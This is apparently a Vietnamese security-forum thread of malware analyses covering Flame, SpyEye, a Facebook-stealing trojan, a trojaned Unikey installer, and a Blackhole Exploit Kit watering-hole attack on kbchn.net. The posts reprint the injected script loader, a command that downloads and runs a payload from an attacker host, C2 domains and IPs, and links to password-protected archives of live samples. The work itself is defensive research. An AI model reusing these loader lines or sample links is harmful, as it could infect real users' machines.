| |
|
|
Bạn gửi link cụ thể để xem toàn bộ HTML source mới biết bị inject chỗ nào.
Mấy cái shellcode này chắc cũng phát tán xâm nhập qua các exploit framework "công nghiệp" thôi 
|
 |
|
|
|
Con này thuộc họ trojan Win32:Nebuler.
|
|
|
|
chiro8x wrote:
Bồ ơi tớ làm như bồ nói rồi sao wrong password nhỉ, tớ có PM bồ rồi.
HEX chữ hoa nhe các bạn
|
|
|
|
http://www.mediafire.com/?9kve51vuczzf5rt
(pass là mã hex viết liền của tên file, bỏ .ext)
Dump of file 00004784.dl:
Code:
3 0 0000E94B QDInit
4 1 0000E94B SetObjectDescriptor
1 0001A817 [NONAME]
2 000206A3 [NONAME]
Dump of file 296e04abb00ea5f18ba021c34e486746:
Code:
1 0 00001077 RpcNsBindingInit
Dump of file 37c97c908706969b2e3addf70b68dc13:
Code:
2 0 0019DDFC CPlApplet
3 1 0019DE26 DDEInit
4 2 0000108E DDEnumCallback
5 3 00064BF4 GetAuthMechanism
6 4 0019DE71 InprocServer
7 5 000F42C9 QueryValueEx
8 6 000011DE SetAuthMechanism
1 7 000011D6 SetEnumStructure
9 8 000012AD ValueEnumCallback
Dump of file advnetcfg.ocx:
Code:
3 0 000030F0 DisableTBS
2 1 00002E9D EnableTBS
1 2 000033A4 UpdateTBSList
Dump of file advnetcfg2.ocx:
Code:
3 0 00002B99 DisableTBS
2 1 000029EE EnableTBS
1 2 00002DBD UpdateTBSList
Dump of file msglu32.ocx:
Code:
4 0 0000501E QDInit
3 1 000050B2 QDRunW
5 2 00004FDB SetObjectDescriptor
1 000083C0 [NONAME]
2 00008485 [NONAME]
Dump of file mssecmgr.ocx:
Code:
2 0 0019DDFC CPlApplet
3 1 0019DE26 DDEInit
4 2 0000108E DDEnumCallback
5 3 00064BF4 GetAuthMechanism
6 4 0019DE71 InprocServer
7 5 000F42C9 QueryValueEx
8 6 000011DE SetAuthMechanism
1 7 000011D6 SetEnumStructure
9 8 000012AD ValueEnumCallback
Dump of file nteps32.ocx:
Code:
4 0 00008A44 CreateABHList
14 1 0000B79A CreatePGHDict
7 2 00003E10 DisableDLV
12 3 0000B359 DisableOFR
2 4 000085A4 DisableSHR
6 5 00003D71 EnableDLV
11 6 0000B106 EnableOFR
1 7 00008480 EnableSHR
5 8 00008A89 FreeABHData
3 9 00008942 GetSML
13 A 0000B6D3 GetWPF
10 B 0000657D ReadVBInfo
8 C 000040A8 RestoreSMLData
9 D 0000653A WriteVBInfo
Dump of file soapr32.ocx:
Code:
1 0 00001077 RpcNsBindingInit
Nhìn sơ qua giống 1 application hơn là 1 virus Các file đều để nguyên xi (compile bằng Microsoft Visual C++), không có pack, trừ các "em bé" trong bụng đã được crypt, version info đều ghi giả mạo Microsoft Corporation.
|
|
|
|
"...Flame còn tinh vi và nguy hiểm gấp 20 lần so với Stuxnet."
"...có thể phải mất 10 năm để hiểu được mọi hoạt động mà Flame có thể gây ra."
- http://vnmedia.vn/VN/cong-nghe/tin-tuc/35_295631/phat_hien_ma_doc_chuyen_doc_trom_email.html
- http://www.wired.com/threatlevel/2012/05/flame/
- http://www.forbes.com/sites/timworstall/2012/05/29/the-real-flame-wars-w32-flamer-found-all-over-the-middle-east/
Phân tích kỹ thuật:
http://www.crysys.hu/skywiper/skywiper.pdf
Con này đã phát tán cách đây từ 5 đến 8 năm, chủ yếu ở khu vực Trung Đông, đặc biệt là Iran, sử dụng tới 5 giải thuật mã hóa, 3 kỹ thuật nén dữ liệu và ít nhất 5 định dạng (format) lưu trữ khác nhau, ngoài ra còn sử dụng cơ sở dữ liệu SQLite 3.6 để lưu trữ thông tin đánh cắp được.
Khả năng của mã độc Flame:
- Kích hoạt micrô của các máy tính bị nhiễm Flame và ghi lại các cuộc đàm thoại Skype cũng như cuộc nói chuyện của những người gần đó.
- Chụp màn hình các email và tin nhắn tức thời cũng như các hoạt động khác.
- Bật kết nối Bluetooth, quét tên và số điện thoại liên lạc ghi trên thiết bị.
- Quét mạng để dò tìm tên và mật khẩu đăng nhập.
- Xóa các tệp tin để xóa sạch dấu vết tồn tại của chúng.
(VnMedia)
|
|
|
|
http://msdn.microsoft.com/en-us/library/windows/hardware/ff548173%28v=vs.85%29.aspx
http://en.wikipedia.org/wiki/Architecture_of_Windows_NT
Tài liệu này của Microsoft cũng khá đầy đủ:
Windows Kernel Architecture Internals
http://research.microsoft.com/en-us/um/redmond/events/wincore2010/Dave_Probert_1.pdf
|
|
|
|
Trang web cuối (sau wwwect) "hù dọa" bằng cách làm giả giao diện phần mềm anti-virus (fake) đang quét ổ đĩa và "phát hiện" ra nhiều "virus" hiển thị thành 1 danh sách y như thật, từ đó dẫn dụ yêu cầu nạn nhân download 1 phần mềm quét virus nhưng thực chất đó là 1 badware (có thể là trojan, adware, spamware,...).
Chiêu này có lâu rồi nhưng chắc cũng không ít người bị dính!
Nếu bạn bấm chạy (Open) file sau khi download/save thì 100% máy bạn đã dính chấu, cần cài 1 phần mềm AV xịn để quét (nhưng chưa chắc sạch hết!).
|
|
|
|
Chắc là các file source trang web của bạn bị chèn các đoạn javascript để tự động gọi java applet download và chạy file test.exe.
Cách đơn giản là mở từng file source xoá đoạn javascript, ngoài ra phải kiểm tra nguyên nhân web của bạn xâm nhập và sửa đổi source được (password FTP yếu, SQL Injection, upload file/image, ...).
Nếu host Windows không loại trừ khả năng đã bị cài backdoor để chiếm quyền điều khiển lâu dài, trường hợp này cài anti-virus quét thử xem sao.
|
|
|
|
|
Mình đoán là service IIS bị stop, nguyên nhân stop được report vào event viewer nên bạn chụp hình hay export log trong Event Viewer post lên đây mới biết được, thông tin chung chung như vậy không giải quyết được.
|
|
|
|
|
Bạn vô Control Panel xem Event Viewer có thông tin báo lỗi gì liên quan IIS không?
|
|
|
|
hoahongtuoi wrote:
chiro8x wrote:
Thực lòng em không cảm thấy tin tưởng vào các ISP của Việt Nam lắm, chúng ta sử dụng internet thông qua các thiết bị mạng và các thiết bị này được phân phối thông qua các ISP. ISP sẽ biết đích xác là ai dùng thiết bị gì, tại địa điểm nào, username đăng nhập vào hệ thống là gì.
Đề nghị bạn nói rõ những nhận định mình trích ở trên, sử dụng căn cứ kỹ thuật, không nhận định cảm tính.
Làm thế nào nhà mạng thống kê được lưu lượng sử dụng internet (dù là cáp đồng, cáp quang hay usb 3G) để cuối tháng in hóa đơn tính tiền cho bạn? Bạn tự tìm hiểu, đó cũng sẽ là lời giải thích cho đề nghị của bạn.
|
|
|
|
Thấy anh TQN đang phân tích em này (post trên FB) nên mình cũng xin được tham gia 1 tí cho vui
http://www.mediafire.com/?1ecnlmadgdacsda
http://www.mediafire.com/download.php?9bo57outrj3ds7h
Dùng công cụ "mì ăn liền" ra được 1 số kết quả:
http://anubis.iseclab.org/?action=result&task_id=1fb329ad44e85331455b2eb38b97922f9&format=html
- HTTP Conversations:
From ANUBIS:1029 to 66.220.158.11:80 - [facebook.com]
Request: GET /
Response: 301 "Moved Permanently"
Request: POST /ajax/chat/settings.php?__a=1
Response: 200 "OK"
Request: POST /ajax/chat/buddy_list.php?__a=1
Response: 200 "OK"
From ANUBIS:1030 to 69.171.242.74:80 - [www.facebook.com]
Request: GET /
Response: 200 ""
Kết hợp với data-mining:
Tổng hợp các kết quả trên có thể dự đoán tóm tắt các hoạt động của em này như sau:
1. Khi chạy sẽ tự copy vào c:\windows\iqs.exe, đặt registry để tự chạy mỗi khi khởi động máy
2. Mở firewall cho file iqs.exe (đặt tên là Microsoft Firevall Engine và MSN Messenger)
3. Tắt service wuauserv (Window Update), chắc là để vô hiệu hóa tool MRT của Microsoft
4. Vô hiệu hoá các phần mềm anti-virus (Kaspersky, Microsoft Esstential - Windows Defender, AntiVir, Avira, AVG), cách đơn giản là sử dụng hàm API NtTerminateProcess để end task tắt tiến trình process.
5. Tìm các window của các chương trình chat (là ICQ, YIM, GTalk) để lấy danh sách nick chat (sử dụng Windows API: FindWindow, GetWindowText,...), Facebook thì dùng API để gửi HTTP request (POST, GET) và sử dụng Windows API truy cập vào HTML DOM (Internet Explorer_Server, DocObject, IEFrame,...) để lấy dữ liệu, sau đó gửi tất cả về "nơi xa", có thể là compiler.r-t-x.com, hoặc 1 host khác tùy theo master server, cũng có thể kết nối thông qua 1 proxy server 74.208.228.202:5050 để gửi dữ liệu.
Tham khảo API FB:
- http://security.stackexchange.com/questions/3570/facebook-spam-phishing-attempt
- http://www.phpkode.com/source/s/facebook-chat/facebook.class.php
- http://imfreedom.org/wiki/Facebook
6. Tự động gửi link lây lan đến các bạn chat trong danh sách (maybe).
7. Đặt lại Trang chủ (Homepage) của các trình duyệt Chrome, Firefox, Internet Explorer, cụ thể đặt link nào thì mình chưa có test tiếp.
Các hoạt động khác như truy cập history của chương trình chat, history của trình duyệt, chỉnh sửa tham số TCP/IP (Winsock) trên Windows, hook hệ thống... có hay không và cụ thể làm những gì thì mình chưa có thời gian phân tích tiếp.
|
|
|
|
Phân tích mì ăn liền con này được 1 số kết quả:
http://eureka.cyber-ta.org/OUTPUT/5b1e1534c828d398b0ae91820913911f/
(trang http://eureka.cyber-ta.org/ unpacked .exe và cho down về).
http://malwr.com/analysis/5b1e1534c828d398b0ae91820913911f/
http://anubis.iseclab.org/?action=result&task_id=1f63a15db72d290947595dc73387528ae&format=html
3.d) wuauclt.exe - Network Activity
- HTTP Conversations:
From ANUBIS:1030 to 91.139.236.32:80 - [losfakers.ru]
Request: POST /and/image.php
Response: 200 "OK"
From ANUBIS:1032 to 89.44.198.188:80 - [losfakers.ru]
Request: GET /t.exe
Response: 200 "OK"
From ANUBIS:1034 to 81.161.207.102:80 - [losfakers.ru]
Request: POST /and/image.php
Response: 200 "OK"
Phân tích host:
91.139.236.32
Ventsislav Marinov Sakadjiyski
Global Communication Net Plc.
4 Kavala Str.
Haskovo
Bulgaria
89.44.198.188
CRISTIAN BIRJARU
ALTIS NET SRL
STR. Marasesti Nr. 9-11
Rosiorii de Vede Teleorman 145100
Romania
81.161.207.102
POL KASKADA Artur Lagodzinski
Jana Kilinskiego 35
Jarocin 63-200
Poland
|
|
|
|
SpyEye steals your data. Even in a limited account
http://www.prevx.com/blog/149/SpyEye-steals-your-data-Even-in-a-limited-account.html
It is a new toolkit called SpyEye.
After this it injects its code inside all the processes it could get access. In every infected process it hooks the following Windows APIs:
CryptEncrypt,LdrLoadDll,NtEnumerateValueKey,NtQueryDirectoryFile,NtResumeThread,NtVdmControl
This allows the trojan to hide its folder and its registry key from the user's eyes and antivirus software, implementing user mode rootkit techniques.
Inside browser processes, the trojan hooks even the following APIs:
TranslateMessage,send,HttpSendRequestA,HttpSendRequestW,InternetCloseHandle
By doing so, it's able to steal all sensitive data going out through the browser session, even SSL encrypted web pages. Using this technique it is even able to conceptually bypass classic anti-keyloggers that encrypt keystrokes.
Win32/Spy.SpyEye.B
http://www.eset.eu/encyclopaedia/win32-spy-spyeye-b-trojan-pincav-shd-backdoor
|
|
|
|
Tình cờ em gu-gồ được mấy link chứa cùng 1 con trojan, download về xem thử thấy cùng 1 nguồn từ "Russia mercenaries" với info.exe:
bannersintpro.org/files/97d19
ligaworldtraders.org/files/97d19
perskitest.org/files/97d19
tartcompanyltd.com/files/97d19
http://www.mediafire.com/download.php?sf59eb1m6txlbb8
Pass: 123
Kết hợp với kết quả RCE của anh TQN thì có thể thấy sự việc như thế này: "ai đó" đã thuê "Russia mercenaries" phát tán trojan (exe hoặc dll), khi nhận được file này thì hacker Nga sẽ nhúng trojan này vào exe engine của họ, engine này có chức năng che dấu trojan của của người thuê (bằng cách hook 1 số hàm API đặc biệt như đã capture ở trên: NtQueryDirectoryFile, NtVdmControl, NtResumeThread,...), sau đó thì họ dùng BlackHole Exploit Kit hoặc các bộ Kit khác để phát tán "sản phẩm cuối cùng" qua mail phishing web, facebook...
|
|
|
|
Ngoài kết quả phân tích tự động bằng sandbox trên ThreatExpert như bolzano đã gửi:
http://www.threatexpert.com/report.aspx?md5=46a69641d00f656e5e9b6fedd12f96f3
Trojan này còn hook 1 số hàm API tương đối đặc biệt:
1. Trước khi chạy info.exe
2. Các process bị hooked sau khi chạy info.exe
|
|
|
|
Một số thông tin về BlackHole Exploit Kit được cài trên máy chủ fb-sv10.co.uk:
1. Các exploit được sử dụng để phát tán malware phiên bản 1.x.x:
CVE-2006-0003
MS06-014 for lE6/Microsoft Data Access Components (MDAC) Remote Code Execution
CVE-2007-5659/2008-0655
PDF Exploit -collab, collectEmaillnfo
CVE-2008-2992
PDF Exploit• util.printf
CVE-2009-0927
PDF Exploit- collab.getlcon
CVE-2010-0188
PDF Exploit - LibTiff Integer Overflow
CVE-2010-0842
JAVA MIDI Java OBE
Unspecified vulnerability in the Sound component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27
CVE-2010-1885
Help Center URL Validation Vulnerability
CVE-2011-0559
Flash 10 by exm
Denial of service (memory corruption) via crafted parameters
CVE-2011-3544
Vulnerability in the Rhino Script Engine
CVE-2012-0507
Java Atomic
CVE-2010-0840
JAVA TC (?) javagetval OBE Java invoke / Java Trust
Trusted Method Chaining - Java getValue Remote Code Execution
CVE-2010-0886
Java SMB / Java JDT in Oracle Java SE and Java for Business JDK and JRE 6 Upd 10-19 * Requires xtra components
CVE-2010-3552
JAVA SKYLINE
Unspecified vulnerability in the New Java Plug-in – Java 6 < Update 22 – IE Only – ALL Windows
2. Minh họa:
http://labs.m86security.com/wp-content/uploads/2011/12/blackhole12.png
Blackhole Exploit Kit control panel
http://imperva.typepad.com/.a/6a01156f8c7ad8970c0162fdb83241970d-pi
3. Giá bán/cho thuê: 
1,500 usd/1 năm
1,000 usd/6 tháng
700 usd/3 tháng
4. Reference:
Danh sách các Exploit Kit và CVE:
http://www.mediafire.com/?vwizwswtwx9p1q3
Deconstructing the Black Hole Exploit Kit
http://blog.imperva.com/2011/12/deconstructing-the-black-hole-exploit-kit.html
Blackhole 1.2.3 released
http://xylibox.blogspot.com/2012/03/blackhole-v123.html
...in config.php change value of 'ExploitsDir' to 'data'(old value was 'content').
|
|
|
|
Em mò được một số domain liên quan:
fb-sv02.com
fb-sv03.co.uk
fb-sv04.co.uk
fb-sv05.co.uk
fb-sv06.co.uk
fb-sv07.co.uk
fb-sv08.co.uk
fb-sv09.co.uk
fb-sv10.co.uk
1. Thông tin người đăng ký:
Registrant:
Annette Kathleen Fisher
Registrant type:
UK Individual
Registrant's address:
183 Albion Way
Verwood
Dorset
BH31 7LT
United Kingdom
Registrar: Fasthosts Internet Ltd [Tag = LIVEDOMAINS]
URL: http://www.fasthosts.co.uk
2. Thông tin kết nối port:
fb-sv07.co.uk
Port 22: SSH-2.0-OpenSSH_5.3
Port 80: nginx/0.8.54
---> http://fb-sv07.co.uk/installation/index.php 
fb-sv09.co.uk
Port 22: SSH-2.0-OpenSSH_5.1p1 Debian-5
Port 80: Server: nginx/0.6.32
fb-sv10.co.uk
Port 22: SSH-2.0-OpenSSH_5.4p1_hpn13v11 FreeBSD-20100308
Port 25: 220 alexander2kupalo.ru ESMTP Sendmail 8.14.5/8.14.5; Sat, 14 Apr 2012 05:51:09 GMT
Port 80: Server: nginx/1.1.18
3. Thông tin hosting:
fb-sv07.co.uk (83.69.226.219)
LTD AWAX Telecom
Moscow, Orlovo-Davydovsky per., 2/5 str
129110 Moscow, Russia
+7 495 6264747
+7 495 6264747
fb-sv10.co.uk (79.137.213.115)
Digital Network NOC
13a, Yaroslavskaya st.,
Moscow, Russia, 129366
+7 495 660 8383
+7 495 660 8383
fb-sv02.com (146.185.249.34)
Petersburg Internet Network ltd.
PIN ROLE
Russia, SPb, Sedova 80
4. Reference:
http://google.com/safebrowsing/diagnostic?site=zaminnews.com/
Malicious software is hosted on 5 domain(s), including fb-sv06.co.uk/, fb-sv04.co.uk/, fb-sv02.com/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including fb-sv02.com/
http://google.com/safebrowsing/diagnostic?site=eccie.net/
Malicious software includes 35 trojan(s), 31 scripting exploit(s). Successful infection resulted in an average of 7 new process(es) on the target machine.
Malicious software is hosted on 3 domain(s), including nl.ai/, update-kb18628311.com/, fb-sv03.co.uk/.
http://google.com/safebrowsing/diagnostic?site=update-kb18628311.com/
Malicious software includes 92 trojan(s), 48 scripting exploit(s).
Theo em thì chắc đây là một tổ chức hacker đánh thuê của Nga
Còn STL có thuê bọn này hay không thì chúng ta cần analyze tiếp dựa trên thông tin tài khoản Facebook đã post comment và payload (info.exe) của BlackHole Kit.
|
|
|
|
Vụ mùa trồng trọt mới này coi bộ hấp dẫn à nhe 
Chơi đủ loại exploit: JAVA applet; PDF exploit; HCP protocol exploit; VBS script...
Sao thấy giống giống đợt trồng trọt ở KBCHN.NET hé 
Em down được 1 số file đang ngâm cứu thử, obfuscate cho dữ vào nhưng mà đường nào rồi cũng dẫn tới Roma thôi hehe 
|
|
|
|
Máy của bạn bị nhiễm con Ramnit rồi, bạn xem lại ở đây nhe:
/hvaonline/posts/list/41645.html#259223
https://www.virustotal.com/file/d8eed1a70a70a6b72e7a398eb50a00877cdaca9f0d8a2dacb6ab4b8aa604e5f3/analysis/
|
|
|
|
Dùng NAT thì bên ngoài cũng chỉ thấy 1 IP thôi, cho dù bên trong mạng LAN có bao nhiêu máy đi chăng nữa.
Nếu mục đích muốn xâm nhập vào 1 máy bên trong thì chỉ có cách truy cập vào modem thiết lập Port Forwarding hoặc DMZ, còn chơi kiểu tà đạo thì cài cắm trồng trọt trojan, netcat là chuyện khác.
Còn kiểm tra proxy thì dùng trang này cũng tạm:
http://all-nettools.com/toolbox/environmental-variables-test.php
|
|
|
|
chiro8x wrote:
Mình có theo dỏi bài viết của bạn miyumi2 trong những ngày gần đây, các bài viết xoay quanh malware và những idols của mình . Phân tích và quá trình lần theo dấu vết của bạn rất lý thú nhưng mình tự hỏi cái gì nằm ở bước 0 ?. Mình chỉ thấy bạn bắt đầu từ bước 1.
Ý của mình là, duyên cớ nào bạn để ý tới :
http://daily.us.to/js/jquery.php
Hay thói quen của bạn là phân thích một trang web trước khi đọc nội dung của nó, hay đây là tình cờ ?.
Chỉ là sự tình cờ thôi bạn à. Khi truy cập trang web này cũng như vô số trang khác từ Google thì Firefox bật lên thông báo missing plug-in, xem chi tiết thấy tên plug-in là Java Runtime.... Mình đoán là có vấn đề vì 1 trang web tin tức thì nhúng java applet để làm gì.
View source HTML thì không thấy thẻ <APPLET> nào --> chắc là dùng javascript để write vào document --> tìm tiếp các file .js thì phát hiện ra file vi.js có url http://daily.us.to/js/jquery.php. Đơn giản là vậy thôi!
|
|
|
|
ODSERV.EXE (nguồn từ fake Unikey) và FBAgent.exe (nguồn từ KBCHN.NET), cả hai cùng chung 1 "big boss" nên từ giờ chắc phải sát nhập 2 topic lại quá
FakeUnikey_extract_01.zip, topic:
/hvaonline/posts/list/41771.html#260312
|
|
|
|
quygia128 wrote:
Bác miyumi2 extract cái file sao hay vậy ? (File thứ 3 bác gửi lên ấy 101.exe) quy bị terminate với thằng FBAgent.exe mà chưa tìm được giải pháp nè (chạy trên VirtualBox).
Mình dùng "gậy ông đập lưng ông" tức là lợi dụng chính cái chiêu "Kim Thiền thoát xác" của mèo-què rss.xml đó mà
Bật mí chút xíu là mình dùng chiêu này để moi từ trong bụng con ODSERV.EXE (con đẻ mèo què FakeUnikey, tạo service trong hệ thống với tên odservice) lấy ra được 1 file exe khác cũng có kích thước 59.392 bytes y chang kích thước file 101.exe (nội dung thì có khác đôi chút) 
@TQN: Anh đừng cười nha, em chưa học xong mấy trang bí kiếp RE của anh nên đành dùng chiêu này tạm vậy
FakeUnikey_extract_01.zip: http://www.mediafire.com/download.php?13dbeapfrsmy4va
Pass: 123
|
|
|
|
TQN wrote:
Trong bụng FBAgent còn một con nữa, bà con reverser cố gắng rút nó ra luôn.
Extract thêm được 1 chú từ FBAgent.exe:
http://www.mediafire.com/download.php?yt996448h6z8ci7
Pass: 123
|
|
|
|
xuanphongdocco wrote:
Cho mình hỏi một tí, làm sao mà mấy bác lấy được file http://daily.us.to/js/jquery.php vậy. Mặc dù mình edit source trang http://kbchn.net/ và thêm từ đó 1 liên kết http://daily.us.to/js/jquery.php nhưng vẫn không được.
|
|
|
|
bolzano_1989 wrote:
http://kbchn.net là một trang web lề trái, phát hiện của miyumi2 rất thú vị, khả năng rất cao là có bàn tay của stl.
Qua một tấn công của stl trước đây, mình confirm chuyện bọn hacker stl có kinh nghiệm trong việc exploit JRE (Java Runtime Environment).
Cho mình ngoài lề một chút.
Cá nhân mình là người làm chuyên môn kỹ thuật nên không quan tâm nhiều về lề trái, lề phải, quan trọng là sự trung thực, khách quan.
Để khách quan các bạn có thể tham khảo nội dung phỏng vấn Thứ trưởng Bộ Ngoại Giao Việt Nam Nguyễn Thanh Sơn, (có đề cập đến KBCHN.NET):
- http://www.youtube.com/watch?v=zPDnaUo1IPM
- www.tienphong.vn/Kieu-Bao/564322/Doan-bao-chi-hai-ngoai-ve-Viet-Nam-lam-phong-su-Tet-tpp.html
(link gốc từ tienphong.vn bị lỗi truy cập, không biết có liên quan gì đến sự việc chèn mã độc này không?)
- CACHED: http://webcache.googleusercontent.com/search?q=cache:REy4PSc50M8J:www.tienphong.vn/Kieu-Bao/564322/Doan-bao-chi-hai-ngoai-ve-Viet-Nam-lam-phong-su-Tet-tpp.html+&cd=1&hl=vi&ct=clnk&gl=vn
P/S: http://www.tienphong.vn/Tim-Kiem/Index.html?keyword=kbchn
|
|
|
|
Tiếp tục chạy file rss.xml (đổi tên thành rss.exe) sẽ thấy rất giống chiêu "Kim Thiền thoát xác" của trojan nhúng trong Unikey:
- Tạo file 5.tmp vào thư mục TEMP và thực thi file này, 5.tmp sẽ terminate process rss.exe, đổi tên rss.exe thành rss.tmp
- Giải mã từ resource tạo file FBAgent.exe trong SYSTEM32, đây là file chính của trojan, khi chạy sẽ nâng quyền lên SYSTEM (chạy giống 1 service).
- Giải mã từ resource tạo lại file rss.exe (kích thước nhỏ hơn rất nhiều), xóa file rss.tmp.
File FBAgent.exe có code phát hiện máy ảo và debugger nên tạm thời chưa theo dõi tiếp được.
http://www.mediafire.com/download.php?42c4ca67blcfksi
Pass: 123
|
|
|
|
23h ngày 28/3/2012 (GMT+7)
1. Đoạn mã khởi tạo đầu tiên được chèn vào cuối file http://kbchn.net/js/language/vi.js
Code:
document.write('<script language="javascript" src="http://daily.us.to/js/jquery.php"></script>');
2. File jquery.php này chỉ trả về dữ liệu (javascript text) nếu trong HTTP header có:
Code:
Referer: http://kbchn.net/
nếu Referer khác sẽ trả về "Error!".
3. Đoạn javascript này
Code:
document.write(base64_decode('PGFwcGxldCB3aWR0aD0nMScgaGVpZ2.....
sẽ chèn một JAVA APPLET chạy code thông qua exploit của JRE
Code:
http://daily.us.to/js/MediaPlayer.jar
4. Mục đích chạy applet là tạo và thực thi 1 file .vbs (yahadfq.vbs) trong thư mục TEMP, khi file này chạy sẽ dùng CreateObject khởi tạo ADODB.Stream lưu lại file lấy từ 1 URL (dùng WinHttp.WinHttpRequest)
Code:
start /MIN %temp%\yahadfq.vbs http://daily.us.to/js/rss.xml %temp%\phfvxlr.exe
--> File rss.xml là 1 exe sau khi tải về sẽ đổi tên thành phfvxlr.exe và chạy.
Trong file exe này có 3 resource (TYPELIB 1000, 1010, 1011) với chuỗi header đầu tiên là MSFT.
Đến đây em đuối rồi, đi tắm thôi  , các anh em nào rảnh thì RE con exe này tiếp xem thế nào.
Tất cả các file em thu thập được trong quá trình phân tích:
http://www.mediafire.com/?79yupp68ip3ogbq
Pass: 123
Cached:
Code:
http://liveweb.archive.org/http://kbchn.net/js/language/vi.js
http://liveweb.archive.org/http://daily.us.to/js/MediaPlayer.jar
http://liveweb.archive.org/http://daily.us.to/js/rss.xml
|
|
|
|
|
Gắn cái 3G vô router *nix, mỗi lần user login thì send 1 sms verify code vào số đt của user đó (ý tưởng thôi chứ em chưa làm bao giờ)
|
|
|
|
|
|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
